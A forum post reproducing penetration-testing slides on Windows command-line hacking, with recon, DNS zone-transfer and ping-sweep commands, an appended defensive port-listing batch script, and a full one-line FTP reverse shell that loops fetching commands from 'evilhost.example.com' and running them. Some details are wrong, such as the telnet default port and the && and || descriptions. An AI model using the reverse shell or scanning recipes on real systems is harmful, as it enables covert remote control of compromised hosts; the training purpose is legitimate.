begood Posted May 3, 2010

Chris Clymer, CISSP
ChrisClymer.com/articles/hacking_windows

Who am I?
- I'm not an MCP, MCSE, MCTS, MCPD, MCITP, or MCA
- I'm not even very good at Minesweeper
- I'm a UNIX geek
- I love the command line
- How much you ask? This entire presentation was created by writing out HTML markup by hand in the Vim text editor

Why are you getting Windows tips from a UNIX guy?
- It turns out that for some reason, not every system runs UNIX
- In fact, the ones we're most concerned about in Information Security are often running Windows (strange!)
- Bearded UNIX guys need to get cozy in the WIN32 world
- Windows veterans benefit from learning to better leverage their OS's CLI
- This presentation could also be called "How I learned to stop installing CYGWIN and love command.exe"

Why hack without your tools?
- You can't always guarantee that you'll have your toolbox available
- Relying on your tools can limit you
- You want to impress women with your leet CLI skills
- The vast majority of the commands I will show you today should work on a typical modern Windows installation

Our friend command.exe
- This lab will focus on command.exe
- Powershell, VB, and WMIC are all powerful tools... but command.exe is the least common denominator on all Windows platforms
- You can launch it by going to Start -> Run -> cmd

Our Building Blocks
- find /i "foo" file - searches through the file "file" for the string "foo". The "/i" makes it case-insensitive
- ping -n 5 host - sends 5 ICMP ping packets to host
- telnet host port - spawns an interactive telnet session to host. If port is specified, this is used instead of the default Telnet port of 21

Command Control and Redirection
- command1 & command2 - Run command1 and then command2
- command1 && command2 - Run command1 only if command2 runs successfully
- command1 || command2 - Execute command1 only when command2 does NOT run successfully
- command > "output.txt" - Redirect output from command to the file "output.txt". Create this file if it does not exist.
- command >> "output.txt" - Concatenate output from command onto the end of file "output.txt"
- command1 | command2 - Pipe the output of command1 into command2
- You can direct the errors from a command using 2> errors.txt

System Reconnaissance
- set - show environment variables
- net user - show local users
- net localgroup - show local groups
- sc query - list running services
- sc query state= all - list all services
- wmic process list full - show details on all running processes
- tasklist /svc - show all running processes and associated services

Network Reconnaissance
- netstat -nao - show all current network activity, including PIDs
- netsh firewall show config - display Windows firewall configuration
- ipconfig /displaydns - systems this host has recently resolved through DNS
- arp -a - systems on the same subnet this host has recently communicated with
- nslookup - all-purpose DNS query tool

Let's Try One
- Clear your DNS cache: ipconfig /flushdns
- ipconfig /displaydns should only show your localhost
- Now let's add an entry: ping google.com
- Another ipconfig /displaydns should show the new entry for google.com

More on Nslookup
- nslookup somehost - will look up that host in DNS based on your localhost's DNS configuration
- nslookup - starts nslookup in interactive mode
- set type=any - configures nslookup to pull down all DNS information including MX, A, CNAME, NS, and PTR
- ls -d example.com - if the server allows it, does a zone transfer of example.com
- ls -t example.com - will give a list of member servers from the domain

Fun with Telnet!
- Telnet is just an outdated, insecure remote administration tool, right?
- What happens when you telnet to a port other than 21?
- Turns out many protocols are simple enough to interact with over telnet
- Telnet can stand in for Netcat for 1-way communication with remote hosts

Let's test out some HTTP
- You won't be able to see what you're typing once you've started telnet
- First type GET /index.html http/1.1 and hit return
- You should see something like the response below

Let's test out some BAD HTTP
- This time we'll type GET blah
- This time we get an error page since we're not passing a valid HTTP query. This is often more helpful, as many HTTP servers happily provide useful information in their error pages

What about SMTP?
- Start out by telnetting to a mailserver on port 25: telnet smtp.gmail.com 25
- Now that we're talking to the server we'll start the session by typing EHLO and then hitting enter
- Type quit when ready to end the session
- If you know your SMTP syntax, you can send email this way

Telnet isn't the only choice
- Many default Windows CLI apps can interact with a network
- Many of these offer shell-like functionality and flexibility
- These apps can fill your Netcat niche when uploading nc.exe isn't an option

Reverse shell using FTP
echo OPEN evilhost.example.com > ftp.txt & echo USER haxeduser >> ftp.txt & echo haxedpw >> ftp.txt & echo PUT output.txt >> ftp.txt & echo DELETE commands.txt >> ftp.txt & echo BYE >> ftp.txt & for /L %i in (1,0,2) do (ftp -n -s:ftp.txt & del output.txt & (for /F "delims=^" %j in (commands.txt) do cmd.exe /c %j 1>output.txt & del commands.txt) & ping -n 4 127.0.0.1)

Explanation of FTP Reverse Shell
- This command will be run on a compromised host
- The command will connect to our host "evilhost" as user "haxeduser" and password "haxedpw"
- Next it will upload the content of "output.txt" to evilhost
- Finally it will download "commands.txt" from evilhost, and run whatever is inside
- All of this is done in an infinite loop
- As long as the commands in "commands.txt" direct their output to "output.txt", evilhost will get the results

Let's Talk About Loops
- FOR /L - these loops are counters: FOR /L %i in (1,1,10) DO echo "Hello World" - prints "Hello World" 10 times
- FOR /F - these loops are iterators: FOR /F %i IN (foo.txt) DO (echo %i) - prints the content of foo.txt line by line

Neat Shell Control Tricks
- FOR /L %i IN (1,0,2) DO foo - an infinite loop. Counts from 1 to 2 in increments of 0
- ping -n 4 127.0.0.1 - effectively "sleep 4". The Windows shell has no "sleep" command, so a local ping can stand in

Network Scanning with Ping
- FOR /L %i in (1,1,255) do @ping -n 1 10.10.10.%i | find "Reply"
- This command will ping every host from 10.10.10.1 - 10.10.10.255
- By using find to parse through the results for "Reply" we only see the hosts which are responding
- By using @ping we prevent the ping commands themselves from showing in the terminal

Reverse DNS Lookups
- FOR /L %i IN (1,1,255) DO @echo 10.10.10.%i IN: & @nslookup 10.10.10.%i 2>nul | find "Name"
- Once again we're iterating through all hosts in the 10.10.10.0/24 network
- This time we will first echo each host's IP to the terminal
- Next we'll run the nslookup command for each IP, suppressing both the command and its errors... all we get is the good output!
- Searching through the results for "Name" gets us the part we care about

Other Useful Commands
- type - show the contents of a file
- openfiles /local on - enable openfiles logging (requires reboot)
- openfiles /query /v - show details on all open files
- reg query [KeyName] - display value of registry key [KeyName]
- net use - mount fileshare

Resources
- "Pen-Test Ninjitsu: Part 1" - Core Security Technologies
- "Built-in Windows Commands to Determine if a System has been Hacked"
- "Nslookup and DNS Zone Transfers"
- SANS 560 Network Penetration Testing and Ethical Hacking - Ed Skoudis (SANS: Computer Security Training, Network Security Research, InfoSec Resources)
- Windows Command Line Second Edition - William Stanek (Microsoft Press)
- "Creating a Remote Command Shell using Default Windows Command Line Tools" - Kevin Bong, SANSFire 2008

SANS 560
- If you found this lab useful, I strongly recommend taking Ed Skoudis's SANS 560 course
- Ed is the best resource I have found for this sort of usage of the Windows CLI
- Much of this lab was based on my experience taking the 560 course
- Ed's 1-day Windows Scripting course covers this material as well
- Plus he's got much better war stories than I do!

Hacking From the Windows Command Line
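A defender-side way to put these building blocks together, added here as an example that is not part of Chris Clymer's slides or the original post: it joins netstat -nao to tasklist through FOR /F tokens so each listening TCP port is listed with its owning process, the kind of first check you run when triaging a box. The output path under %TEMP% and the English "INFO:" string that tasklist prints when a PID matches nothing are my assumptions.

```batch
@echo off
REM Added example, not from the original slides: list listening TCP ports
REM together with the process that owns them, using only netstat, tasklist,
REM FOR /F, find and redirection.
REM Assumption: %TEMP% is writable and tasklist speaks English.
setlocal EnableDelayedExpansion
set "OUT=%TEMP%\listeners.txt"
echo Local address        PID    Image name>"%OUT%"

REM netstat -nao prints:  TCP    0.0.0.0:135    0.0.0.0:0    LISTENING    1040
REM tokens=2,4,5 gives %%A=local address, %%B=state, %%C=PID.
REM The pipe must be escaped as ^| inside the FOR /F command string.
for /F "tokens=2,4,5" %%A in ('netstat -nao ^| find "LISTENING"') do (
    set "IMAGE=unknown"
    REM tasklist /FI filters on PID, /NH drops the header, /FO CSV quotes
    REM each field so the image name is the first comma-separated token.
    REM find /V drops the "INFO: No tasks are running..." line when no PID matches.
    for /F "tokens=1 delims=," %%P in ('tasklist /FI "PID eq %%C" /NH /FO CSV ^| find /V "INFO:"') do (
        set "IMAGE=%%~P"
    )
    echo %%A  %%C  !IMAGE!>>"%OUT%"
)
type "%OUT%"
endlocal
```

Save it as listeners.bat and run it from cmd.exe; typed directly at an interactive prompt, every %%A-style variable is written with a single percent sign instead.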
Flubber Posted May 4, 2010

bookmarked, exceptional, I have wanted something like this for a long time and it is very, very useful!

> You can't always guarantee that you'll have your toolbox available
> Relying on your tools can limit you

11/10